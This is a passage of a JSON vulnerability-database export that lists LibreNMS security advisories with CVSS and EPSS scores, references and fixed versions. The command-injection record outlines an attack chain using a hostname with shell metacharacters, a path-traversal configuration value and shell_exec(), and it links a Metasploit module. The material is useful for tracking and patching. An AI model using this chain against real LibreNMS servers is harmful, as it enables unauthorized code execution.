aliases":["CVE-2021-31274","GHSA-2r2w-jrh2-p4gr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f6gw-kx8g-r3ac"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55919?format=json","vulnerability_id":"VCID-f9v9-rmse-cbcg","summary":"LibreNMS vulnerable to Stored Cross-site Scripting via File Upload\nStored Cross-Site Scripting (XSS) can archive via Uploading a new Background for a Custom Map.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47528","reference_id":"","reference_type":"","scores":[{"value":"0.00406","scoring_system":"epss","scoring_elements":"0.6142","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00406","scoring_system":"epss","scoring_elements":"0.61423","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00406","scoring_system":"epss","scoring_elements":"0.61402","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00406","scoring_system":"epss","scoring_elements":"0.61433","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00406","scoring_system":"epss","scoring_elements":"0.61426","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47528"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/d959bf1b366319eda16e3cd6dfda8a22beb203be","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"4.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T13:07:21Z/"}],"url":"https://github.com/librenms/librenms/commit/d959bf1b366319eda16e3cd6dfda8a22beb203be"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47528","reference_id":"CVE-2024-47528","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47528"},{"reference_url":"https://github.com/advisories/GHSA-x8gm-j36p-fppf","reference_id":"GHSA-x8gm-j36p-fppf","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x8gm-j36p-fppf"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-x8gm-j36p-fppf","reference_id":"GHSA-x8gm-j36p-fppf","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"4.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T13:07:21Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-x8gm-j36p-fppf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82814?format=json","purl":"pkg:composer/librenms/librenms@24.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.9.0"}],"aliases":["CVE-2024-47528","GHSA-x8gm-j36p-fppf"],"risk_score":2.1,"exploitability":"0.5","weighted_severity":"4.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f9v9-rmse-cbcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56210?format=json","vulnerability_id":"VCID-fc9k-4dhn-m7du","summary":"LibreNMS has an Authenticated OS Command Injection\nAn authenticated attacker can create dangerous directory names on the system and alter sensitive configuration parameters through the web portal. Those two defects combined then allows to inject arbitrary OS commands inside `shell_exec()` calls, thus achieving arbitrary code execution.\n\nWith all this, an authenticated attacker can:\n- Create a malicious Device with shell metacharacters inside its hostname\n- Force the creation of directory containing shell metacharacters through the PollDevice job\n- Modify the `snmpget` configuration variable to point to a valid system binary, while also using the directory created in the previous step via a path traversal (i.e: `/path/to/install/dir/rrd/<DEVICE_HOSTNAME>/../../../../../../../bin/ls`)\n- Trigger a code execution via the `shell_exec()` call contained in the `AboutController.php` script","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51092","reference_id":"","reference_type":"","scores":[{"value":"0.44112","scoring_system":"epss","scoring_elements":"0.97616","published_at":"2026-06-07T12:55:00Z"},{"value":"0.44112","scoring_system":"epss","scoring_elements":"0.97618","published_at":"2026-06-09T12:55:00Z"},{"value":"0.44112","scoring_system":"epss","scoring_elements":"0.97615","published_at":"2026-06-05T12:55:00Z"},{"value":"0.44112","scoring_system":"epss","scoring_elements":"0.97617","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51092"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:10:38Z/"}],"url":"https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51092","reference_id":"CVE-2024-51092","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51092"},{"reference_url":"https://github.com/advisories/GHSA-x645-6pf9-xwxw","reference_id":"GHSA-x645-6pf9-xwxw","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x645-6pf9-xwxw"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-x645-6pf9-xwxw","reference_id":"GHSA-x645-6pf9-xwxw","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:10:38Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-x645-6pf9-xwxw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-51092","GHSA-x645-6pf9-xwxw"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fc9k-4dhn-m7du"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55911?format=json","vulnerability_id":"VCID-gj21-fy13-33h2","summary":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Alert Templates\" feature\nA Self Cross-Site Scripting (Self-XSS) vulnerability in the \"Alert Templates\" feature allows users to inject arbitrary JavaScript into the alert template's name. This script executes immediately upon submission but does not persist after a page refresh.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47526","reference_id":"","reference_type":"","scores":[{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34217","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34197","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34177","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34252","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34236","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47526"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"3.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40","reference_id":"","reference_type":"","scores":[{"value":"3.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T13:02:06Z/"}],"url":"https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40"},{"reference_url":"https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205","reference_id":"","reference_type":"","scores":[{"value":"3.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T13:02:06Z/"}],"url":"https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205"},{"reference_url":"https://github.com/librenms/librenms/commit/f259edc19b9f0ccca484c60b1ba70a0bfff97ef5","reference_id":"","reference_type":"","scores":[{"value":"3.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T13:02:06Z/"}],"url":"https://github.com/librenms/librenms/commit/f259edc19b9f0ccca484c60b1ba70a0bfff97ef5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47526","reference_id":"CVE-2024-47526","reference_type":"","scores":[{"value":"3.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47526"},{"reference_url":"https://github.com/advisories/GHSA-gcgp-q2jq-fw52","reference_id":"GHSA-gcgp-q2jq-fw52","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gcgp-q2jq-fw52"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-gcgp-q2jq-fw52","reference_id":"GHSA-gcgp-q2jq-fw52","reference_type":"","scores":[{"value":"3.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T13:02:06Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-gcgp-q2jq-fw52"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82814?format=json","purl":"pkg:composer/librenms/librenms@24.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.9.0"}],"aliases":["CVE-2024-47526","GHSA-gcgp-q2jq-fw52"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.1","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gj21-fy13-33h2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50228?format=json","vulnerability_id":"VCID-h5y9-mrn4-q7br","summary":"LibreNMS has a Time-Based Blind SQL Injection in address-search.inc.php\nA time-based blind SQL injection vulnerability exists in `address-search.inc.php` via the `address` parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26990","reference_id":"","reference_type":"","scores":[{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00132","published_at":"2026-06-08T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00136","published_at":"2026-06-06T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00135","published_at":"2026-06-05T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00131","published_at":"2026-06-09T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00133","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26990"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-20T15:29:14Z/"}],"url":"https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1"},{"reference_url":"https://github.com/librenms/librenms/pull/18777","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-20T15:29:14Z/"}],"url":"https://github.com/librenms/librenms/pull/18777"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26990","reference_id":"CVE-2026-26990","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26990"},{"reference_url":"https://github.com/advisories/GHSA-79q9-wc6p-cf92","reference_id":"GHSA-79q9-wc6p-cf92","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-79q9-wc6p-cf92"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92","reference_id":"GHSA-79q9-wc6p-cf92","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-20T15:29:14Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74102?format=json","purl":"pkg:composer/librenms/librenms@26.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@26.2.0"}],"aliases":["CVE-2026-26990","GHSA-79q9-wc6p-cf92"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h5y9-mrn4-q7br"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55912?format=json","vulnerability_id":"VCID-hacq-7c9c-qkaz","summary":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Alert Transports\" feature\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Alert Transports\" feature allows authenticated users to inject arbitrary JavaScript through the \"Details\" section (which contains multiple fields depending on which transport is selected at that moment). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47523","reference_id":"","reference_type":"","scores":[{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.59815","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.59796","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.59816","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.59824","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0038","scoring_system":"epss","scoring_elements":"0.5982","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47523"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T12:57:21Z/"}],"url":"https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40"},{"reference_url":"https://github.com/librenms/librenms/commit/ee1afba003d33667981e098c83295f599d88439c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T12:57:21Z/"}],"url":"https://github.com/librenms/librenms/commit/ee1afba003d33667981e098c83295f599d88439c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47523","reference_id":"CVE-2024-47523","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/